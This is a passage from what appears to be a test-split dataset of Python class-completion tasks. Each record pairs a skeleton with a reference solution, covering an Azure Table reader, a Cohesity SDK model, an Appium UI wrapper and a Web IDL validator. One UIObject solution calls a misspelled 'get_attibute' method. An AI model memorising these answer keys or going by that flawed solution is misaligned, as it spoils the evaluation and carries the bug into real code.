"revision_id": "8d5f9a2d49ab8f9e85ccf058cb02c2fda287afc6", "skeleton": "<|skeleton|>\nclass AzureTableReader:\n \"\"\"This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\"\"\"\n\n def __init__(self, logger: AirbyteLogger, config: dict):\n \"\"\"Parameters ---------- config : dict Airbyte's configuration object\"\"\"\n <|body_0|>\n\n def get_table_service_client(self) -> TableServiceClient:\n \"\"\"Returns azure table service client from connection string. Table service client facilitates interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\"\"\"\n <|body_1|>\n\n def get_table_client(self, table_name: str) -> TableClient:\n \"\"\"Returns azure table client from connection string. Table client facilitates interaction with table entities/rows. 
Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like to create a table client for.\"\"\"\n <|body_2|>\n\n def get_tables(self) -> ItemPaged:\n \"\"\"Fetches all tables from storage account and returns them in Airbyte stream.\"\"\"\n <|body_3|>\n\n def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable:\n \"\"\"Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\"\"\"\n <|body_4|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class AzureTableReader:\n \"\"\"This reader reads data from given table Attributes ---------- logger : AirbyteLogger Airbyte's Logger instance account_name : str The name of your storage account. access_key : str The access key to your storage account. Read more about access keys here - https://docs.microsoft.com/en-us/azure/storage/common/storage-account-keys-manage?tabs=azure-portal#view-account-access-keys endpoint_suffix : str The Table service account URL suffix. Read more about suffixes here - https://docs.microsoft.com/en-us/azure/storage/common/storage-configure-connection-string#create-a-connection-string-with-an-endpoint-suffix connection_string: str storage account connection string created using above params. R\"\"\"\n\n def __init__(self, logger: AirbyteLogger, config: dict):\n \"\"\"Parameters ---------- config : dict Airbyte's configuration object\"\"\"\n self.logger = logger\n self.account_name = config[constants.azure_storage_account_name_key_name]\n self.access_key = config[constants.azure_storage_access_key_key_name]\n self.endpoint_suffix = config[constants.azure_storage_endpoint_suffix_key_name]\n self.connection_string = 'DefaultEndpointsProtocol=https;AccountName={};AccountKey={};EndpointSuffix={}'.format(self.account_name, self.access_key, self.endpoint_suffix)\n\n def get_table_service_client(self) -> TableServiceClient:\n \"\"\"Returns azure table service client from connection string. Table service client facilitates interaction with tables. Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-tables\"\"\"\n try:\n return TableServiceClient.from_connection_string(conn_str=self.connection_string)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n\n def get_table_client(self, table_name: str) -> TableClient:\n \"\"\"Returns azure table client from connection string. Table client facilitates interaction with table entities/rows. 
Please read more here - https://docs.microsoft.com/en-us/rest/api/storageservices/operations-on-entities Parameters ---------- table_name : str table name for which you would like to create a table client for.\"\"\"\n try:\n if not table_name:\n raise Exception('An exception occurred: table name is not valid.')\n return TableClient.from_connection_string(self.connection_string, table_name=table_name)\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n\n def get_tables(self) -> ItemPaged:\n \"\"\"Fetches all tables from storage account and returns them in Airbyte stream.\"\"\"\n try:\n table_service_client = self.get_table_service_client()\n tables_iterator = table_service_client.list_tables(results_per_page=constants.results_per_page)\n return tables_iterator\n except Exception as e:\n raise Exception(f'An exception occurred: {str(e)}')\n\n def read_table(self, table_client: TableClient, filter_query: str=None) -> Iterable:\n \"\"\"Reads data from an Azure table. Parameters ---------- table_client : TableClient table client object to be able to access querying methods. filter_query : str either None or a query to pull data from table storage (based on the PartitionKey)\"\"\"\n if filter_query is None:\n return table_client.list_entities()\n else:\n return table_client.query_entities(query_filter=filter_query, results_per_page=constants.results_per_page)\n", "source": "the_stack_v2_python_sparse", "source_path": "dts/airbyte/airbyte-integrations/connectors/source-azure-table/source_azure_table/azure_table.py", "source_repo": "alldatacenter/alldata", "split": "test", "star_events_count": 774} {"blob_id": "cd8d22e46ba847769f048ad78e47486e3e3c9c43", "bodies": ["self.protection_sources = protection_sources\nself.sid = sid\nself.views = views", "if dictionary is None:\n return None\nprotection_sources = None\nif dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\nsid = dictionary.get('sid')\nviews = None\nif dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\nreturn cls(protection_sources, sid, views)"], "bodies_text": "<|body_start_0|>\n self.protection_sources = protection_sources\n self.sid = sid\n self.views = views\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n protection_sources = None\n if dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\n sid = dictionary.get('sid')\n views = None\n if dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\n return cls(protection_sources, sid, views)\n<|end_body_1|>\n", "class_docstring": "Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. 
Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.", "class_name": "SourcesForSid", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass SourcesForSid:\n \"\"\"Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\"\"\"\n\n def __init__(self, protection_sources=None, sid=None, views=None):\n \"\"\"Constructor for the SourcesForSid class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.protection_sources = protection_sources\n self.sid = sid\n self.views = views\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n protection_sources = None\n if dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\n sid = dictionary.get('sid')\n views = None\n if dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\n return cls(protection_sources, sid, views)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000484", "length_bytes": 2792, "license_type": "permissive", "methods": [{"docstring": "Constructor for the SourcesForSid class", "name": "__init__", "signature": "def __init__(self, protection_sources=None, sid=None, views=None)"}, {"docstring": "Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "name": "from_dictionary", "signature": "def from_dictionary(cls, dictionary)"}], "n_methods": 2, "prompt": "Implement the Python class `SourcesForSid` described below.\n\nClass description:\nImplementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). 
Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\n\nMethod signatures and docstrings:\n- def __init__(self, protection_sources=None, sid=None, views=None): Constructor for the SourcesForSid class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.", "prompted_full_text": "Implement the Python class `SourcesForSid` described below.\n\nClass description:\nImplementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\n\nMethod signatures and docstrings:\n- def __init__(self, protection_sources=None, sid=None, views=None): Constructor for the SourcesForSid class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass SourcesForSid:\n \"\"\"Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\"\"\"\n\n def __init__(self, protection_sources=None, sid=None, views=None):\n \"\"\"Constructor for the SourcesForSid class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.protection_sources = protection_sources\n self.sid = sid\n self.views = views\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n protection_sources = None\n if dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\n sid = dictionary.get('sid')\n views = None\n if dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\n return cls(protection_sources, sid, views)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass SourcesForSid:\n \"\"\"Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\"\"\"\n\n def __init__(self, protection_sources=None, sid=None, views=None):\n \"\"\"Constructor for the SourcesForSid class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class SourcesForSid:\n \"\"\"Implementation of the 'SourcesForSid' model. Protection Sources and Views With Access Permissions. Specifies the Protection Sources objects and Views that the specified principal has permissions to access. The principal is specified using a security identifier (SID). Attributes: protection_sources (list of ProtectionSource): Array of Protection Sources. Specifies the Protection Source objects that the specified principal has permissions to access. sid (string): Specifies the security identifier (SID) of the principal. views (list of View): Array of View Names. Specifies the names of the Views that the specified principal has permissions to access.\"\"\"\n\n def __init__(self, protection_sources=None, sid=None, views=None):\n \"\"\"Constructor for the SourcesForSid class\"\"\"\n self.protection_sources = protection_sources\n self.sid = sid\n self.views = views\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n protection_sources = None\n if dictionary.get('protectionSources') != None:\n protection_sources = list()\n for structure in dictionary.get('protectionSources'):\n protection_sources.append(cohesity_management_sdk.models.protection_source.ProtectionSource.from_dictionary(structure))\n sid = dictionary.get('sid')\n views = None\n if dictionary.get('views') != None:\n views = list()\n for structure in dictionary.get('views'):\n views.append(cohesity_management_sdk.models.view.View.from_dictionary(structure))\n return cls(protection_sources, sid, views)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/sources_for_sid.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "b9f2c99e1f499d12ebfaa30640a27f22827b6d09", "bodies": ["self._element_tag = element_tag\nself._xpath = xpath\nself.__main_controller = controller\nself._element = None", "try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\nexcept NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()", "if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\nreturn self._element.is_displayed()", "if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\nreturn self._element.is_enabled()", "if self._element is None:\n self._set_element()\nreturn self._element.get_attribute(name)", "if self._element is None:\n self._set_element()\nif self._element.is_displayed() and self._element.is_enabled():\n return True\nreturn False"], "bodies_text": "<|body_start_0|>\n self._element_tag = element_tag\n self._xpath = xpath\n self.__main_controller = controller\n self._element = None\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n except NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()\n<|end_body_1|>\n\n<|body_start_2|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_displayed()\n<|end_body_2|>\n\n<|body_start_3|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_enabled()\n<|end_body_3|>\n\n<|body_start_4|>\n if self._element is None:\n self._set_element()\n return self._element.get_attribute(name)\n<|end_body_4|>\n\n<|body_start_5|>\n if self._element is None:\n self._set_element()\n if self._element.is_displayed() and self._element.is_enabled():\n return True\n return False\n<|end_body_5|>\n", "class_docstring": "UIObject definition", "class_name": "UIObject", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass UIObject:\n \"\"\"UIObject definition\"\"\"\n\n def 
__init__(self, controller, element_tag=None, xpath=None):\n \"\"\"Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\"\"\"\n <|body_0|>\n\n def _set_element(self):\n \"\"\"Creates the link between the class and the UI element. Virtualizes the UI element.\"\"\"\n <|body_1|>\n\n def is_visible(self):\n \"\"\"Checks if the element is visible or not. :return: True if the element is visible, False otherwise.\"\"\"\n <|body_2|>\n\n def is_enabled(self):\n \"\"\"Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\"\"\"\n <|body_3|>\n\n def get_attribute(self, name):\n \"\"\"Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\"\"\"\n <|body_4|>\n\n def _is_interactable(self):\n \"\"\"Checks if the element is interactable or not. * if it is enabled and visible.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._element_tag = element_tag\n self._xpath = xpath\n self.__main_controller = controller\n self._element = None\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n except NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()\n<|end_body_1|>\n\n<|body_start_2|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_displayed()\n<|end_body_2|>\n\n<|body_start_3|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_enabled()\n<|end_body_3|>\n\n<|body_start_4|>\n if self._element is None:\n self._set_element()\n return self._element.get_attribute(name)\n<|end_body_4|>\n\n<|body_start_5|>\n if self._element is None:\n self._set_element()\n if self._element.is_displayed() and self._element.is_enabled():\n return True\n return False\n<|end_body_5|>\n", "id": "stack_v2_sparse_classes_10k_test_000485", "length_bytes": 2764, "license_type": "no_license", "methods": [{"docstring": "Constructor. :param controller: Main Controller :param element_tag: The path of the ui object", "name": "__init__", "signature": "def __init__(self, controller, element_tag=None, xpath=None)"}, {"docstring": "Creates the link between the class and the UI element. Virtualizes the UI element.", "name": "_set_element", "signature": "def _set_element(self)"}, {"docstring": "Checks if the element is visible or not. :return: True if the element is visible, False otherwise.", "name": "is_visible", "signature": "def is_visible(self)"}, {"docstring": "Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.", "name": "is_enabled", "signature": "def is_enabled(self)"}, {"docstring": "Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.", "name": "get_attribute", "signature": "def get_attribute(self, name)"}, {"docstring": "Checks if the element is interactable or not. 
* if it is enabled and visible.", "name": "_is_interactable", "signature": "def _is_interactable(self)"}], "n_methods": 6, "original_id": "stack_v2_sparse_classes_30k_train_001868", "prompt": "Implement the Python class `UIObject` described below.\n\nClass description:\nUIObject definition\n\nMethod signatures and docstrings:\n- def __init__(self, controller, element_tag=None, xpath=None): Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\n- def _set_element(self): Creates the link between the class and the UI element. Virtualizes the UI element.\n- def is_visible(self): Checks if the element is visible or not. :return: True if the element is visible, False otherwise.\n- def is_enabled(self): Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\n- def get_attribute(self, name): Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\n- def _is_interactable(self): Checks if the element is interactable or not. * if it is enabled and visible.", "prompted_full_text": "Implement the Python class `UIObject` described below.\n\nClass description:\nUIObject definition\n\nMethod signatures and docstrings:\n- def __init__(self, controller, element_tag=None, xpath=None): Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\n- def _set_element(self): Creates the link between the class and the UI element. Virtualizes the UI element.\n- def is_visible(self): Checks if the element is visible or not. :return: True if the element is visible, False otherwise.\n- def is_enabled(self): Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\n- def get_attribute(self, name): Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\n- def _is_interactable(self): Checks if the element is interactable or not. * if it is enabled and visible.\n\n<|skeleton|>\nclass UIObject:\n \"\"\"UIObject definition\"\"\"\n\n def __init__(self, controller, element_tag=None, xpath=None):\n \"\"\"Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\"\"\"\n <|body_0|>\n\n def _set_element(self):\n \"\"\"Creates the link between the class and the UI element. Virtualizes the UI element.\"\"\"\n <|body_1|>\n\n def is_visible(self):\n \"\"\"Checks if the element is visible or not. :return: True if the element is visible, False otherwise.\"\"\"\n <|body_2|>\n\n def is_enabled(self):\n \"\"\"Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\"\"\"\n <|body_3|>\n\n def get_attribute(self, name):\n \"\"\"Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\"\"\"\n <|body_4|>\n\n def _is_interactable(self):\n \"\"\"Checks if the element is interactable or not. 
* if it is enabled and visible.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._element_tag = element_tag\n self._xpath = xpath\n self.__main_controller = controller\n self._element = None\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n except NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()\n<|end_body_1|>\n\n<|body_start_2|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_displayed()\n<|end_body_2|>\n\n<|body_start_3|>\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_enabled()\n<|end_body_3|>\n\n<|body_start_4|>\n if self._element is None:\n self._set_element()\n return self._element.get_attribute(name)\n<|end_body_4|>\n\n<|body_start_5|>\n if self._element is None:\n self._set_element()\n if self._element.is_displayed() and self._element.is_enabled():\n return True\n return False\n<|end_body_5|>\n", "revision_id": "f9522c301d6bf2e0086316b1e212a39a366bcfc6", "skeleton": "<|skeleton|>\nclass UIObject:\n \"\"\"UIObject definition\"\"\"\n\n def __init__(self, controller, element_tag=None, xpath=None):\n \"\"\"Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\"\"\"\n <|body_0|>\n\n def _set_element(self):\n \"\"\"Creates the link between the class and the UI element. Virtualizes the UI element.\"\"\"\n <|body_1|>\n\n def is_visible(self):\n \"\"\"Checks if the element is visible or not. :return: True if the element is visible, False otherwise.\"\"\"\n <|body_2|>\n\n def is_enabled(self):\n \"\"\"Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\"\"\"\n <|body_3|>\n\n def get_attribute(self, name):\n \"\"\"Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\"\"\"\n <|body_4|>\n\n def _is_interactable(self):\n \"\"\"Checks if the element is interactable or not. * if it is enabled and visible.\"\"\"\n <|body_5|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class UIObject:\n \"\"\"UIObject definition\"\"\"\n\n def __init__(self, controller, element_tag=None, xpath=None):\n \"\"\"Constructor. :param controller: Main Controller :param element_tag: The path of the ui object\"\"\"\n self._element_tag = element_tag\n self._xpath = xpath\n self.__main_controller = controller\n self._element = None\n\n def _set_element(self):\n \"\"\"Creates the link between the class and the UI element. 
Virtualizes the UI element.\"\"\"\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n except NoSuchUIElement:\n index_ = 0\n success = False\n while index_ < Settings.Errors.RETRY_NUMBER and (not success):\n time.sleep(Settings.Waits.SMALL_SLEEP_TIME)\n try:\n self._element = self.__main_controller.appium.get_element(self._element_tag)\n success = True\n break\n except NoSuchUIElement:\n pass\n index_ += 1\n if not success:\n raise NoSuchUIElement()\n\n def is_visible(self):\n \"\"\"Checks if the element is visible or not. :return: True if the element of visible, False otherwise.\"\"\"\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_displayed()\n\n def is_enabled(self):\n \"\"\"Checks if the element is enabled or not. :return: True if the element is enabled, False otherwise.\"\"\"\n if self._element is None:\n try:\n self._set_element()\n except NoSuchUIElement:\n return False\n return self._element.is_enabled()\n\n def get_attribute(self, name):\n \"\"\"Returns an attribute related to the element. :param name: the name of the attribute. :return: returns the value of the attribute.\"\"\"\n if self._element is None:\n self._set_element()\n return self._element.get_attibute(name)\n\n def _is_interactable(self):\n \"\"\"Checks if the element is interactable of not. * if it is enabled and visible.\"\"\"\n if self._element is None:\n self._set_element()\n if self._element.is_displayed() and self._element.is_enabled():\n return True\n return False\n", "source": "the_stack_v2_python_sparse", "source_path": "src/model/UIElements/UIObject.py", "source_repo": "meltiseugen/mobile-automation-framework", "split": "test", "star_events_count": 0} {"blob_id": "eee18abb93ebdf80418580163a8aa400d31eef34", "bodies": ["assert isinstance(web_idl_database, web_idl.Database)\nself._web_idl_database = web_idl_database\nself._target_store = TargetStore(web_idl_database)", "assert isinstance(rule_store, RuleStore)\nrule = None\ntarget_type = None\ntarget_object = None\n\ndef assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\nfor target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)"], "bodies_text": "<|body_start_0|>\n assert isinstance(web_idl_database, web_idl.Database)\n self._web_idl_database = web_idl_database\n self._target_store = TargetStore(web_idl_database)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(rule_store, RuleStore)\n rule = None\n target_type = None\n target_object = None\n\n def assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\n for target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)\n<|end_body_1|>\n", "class_docstring": "Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an 
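The `_set_element` body in the UIObject record retries a flaky lookup a fixed number of times with a fixed sleep before re-raising. A standalone sketch of that retry shape (`NoSuchUIElement` and the `lookup` callable stand in for the record's Appium controller; the constants mirror `Settings.Errors.RETRY_NUMBER` and `Settings.Waits.SMALL_SLEEP_TIME`; note that `get_attibute` elsewhere in the record is the upstream source's spelling — the standard Selenium/Appium call is `get_attribute`):

import time


class NoSuchUIElement(Exception):
    """Stand-in for the framework's element-lookup failure."""


RETRY_NUMBER = 3        # mirrors Settings.Errors.RETRY_NUMBER
SMALL_SLEEP_TIME = 0.5  # mirrors Settings.Waits.SMALL_SLEEP_TIME


def get_element_with_retry(lookup, tag):
    """Try once, then retry with a fixed sleep, re-raising on exhaustion."""
    try:
        return lookup(tag)
    except NoSuchUIElement:
        for _ in range(RETRY_NUMBER):
            time.sleep(SMALL_SLEEP_TIME)
            try:
                return lookup(tag)
            except NoSuchUIElement:
                pass  # swallow and retry until attempts run out
        raise NoSuchUIElement(tag)


# Usage with a lookup that succeeds on the third call.
calls = {'n': 0}

def flaky_lookup(tag):
    calls['n'] += 1
    if calls['n'] < 3:
        raise NoSuchUIElement(tag)
    return f'<element {tag}>'

print(get_element_with_retry(flaky_lookup, 'login_button'))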
instance of web_idl.Database.", "class_name": "Validator", "detected_licenses": ["GPL-1.0-or-later", "MIT", "LGPL-2.0-or-later", "Apache-2.0", "LicenseRef-scancode-warranty-disclaimer", "LGPL-2.1-only", "GPL-2.0-only", "LGPL-2.0-only", "BSD-2-Clause", "LicenseRef-scancode-other-copyleft", "BSD-3-Clause"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Validator:\n \"\"\"Provides an API to Check if each IDL file follows rules defined in Web IDL by validating an instance of web_idl.Database.\"\"\"\n\n def __init__(self, web_idl_database):\n \"\"\"Instantiates with web_idl.Database.\"\"\"\n <|body_0|>\n\n def execute(self, rule_store, report_error):\n \"\"\"Validates `_web_idl_database` follows the rules stored in `rule_store`. Args: rule_store: A RuleStore which holds rules. report_error: A function to handle a detected error. It takes a Rule object, a target object, a debug_info, and an error_message. Returns: The number of validation errors.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n assert isinstance(web_idl_database, web_idl.Database)\n self._web_idl_database = web_idl_database\n self._target_store = TargetStore(web_idl_database)\n<|end_body_0|>\n\n<|body_start_1|>\n assert isinstance(rule_store, RuleStore)\n rule = None\n target_type = None\n target_object = None\n\n def assert_(condition, text, *args, **kwargs):\n if not condition:\n error_message = text.format(*args, **kwargs)\n report_error(rule=rule, target=target_object, target_type=target_type, error_message=error_message)\n for target_type in rule_store.all_target_types:\n rules = rule_store.get_rules(target_type)\n target_objects = self._target_store.get(target_type)\n for target_object in target_objects:\n for rule in rules:\n assert isinstance(rule, RuleBase)\n rule.validate(assert_, target_object)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000486", "length_bytes": 2079, "license_type": "permissive", "methods": [{"docstring": "Instantiates with web_idl.Database.", "name": "__init__", "signature": "def 